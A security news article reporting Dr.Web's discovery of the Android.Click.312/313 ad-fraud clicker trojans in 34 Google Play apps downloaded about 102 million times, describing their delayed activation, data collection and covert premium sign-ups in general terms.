Security Architecture, Endpoint/Device Security, Endpoint/Device Security, Threat Management, Threat Management, Malware, Endpoint/Device Security, Endpoint/Device Security, Endpoint/Device Security

Trojanized apps containing ad fraud malware downloaded 102M times

Two related ad fraud malware programs, recently discovered in 34 trojanized Android applications, have already been downloaded roughly 102 million times from the Google Play store, researchers reported.

Dubbed Android.Click.312.origin and Android.Click.313.origin, the malicious clicker trojans appear to be designed primarily to sign users up for paid premium services without their consent, according to a blog post published last week researchers at Russian antivirus company Dr.Web.

The malware has been found in a wide variety of otherwise normal-looking and operable apps, including maps, QR code readers, dictionaries, fitness trackers, route finders, text editors, Muslim-centric apps and more. The blog post has republished a series of app user complaints, which are written in Cyrillic, suggesting the attackers appear to be targeting Russian-speaking users.

After its initial launch, Android.Click.312.origin and its modified variant Android.Click.313.origin waits eight hours before commencing malicious activity, in hopes of staying under the radar. Once active again, it exfiltrates a variety of user information to its command-and-control server, including device manufacturer and model, operating system version, country of residence and default system language, user-agent ID, mobile carrier, internet connection type, display parameters, time zone and data on the application that contained the trojan in the first place.

"In response, Android.Click.312.origin receives website addresses to open in an invisible WebView, as well as links to load in a browser or on Google Play," the blog post said. "Thus, depending on the settings of the command and control server and the instructions it sends, the trojan can not only advertise applications on Google Play, but also covertly load any websites, including advertisements (even videos) or other dubious content." This allows the malware to secretly sign up for premium services without the victim's knowledge or confirmation.

Dr.Web said that Google removed "some applications" from its store after being informed of the threat; however, as of Aug. 8, "most applications still contained a malicious module and remained available for download."

Bradley Barth

As director of community content at CyberRisk Alliance, Bradley Barth develops content for SC Media online conferences and events, as well as video/multimedia projects. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.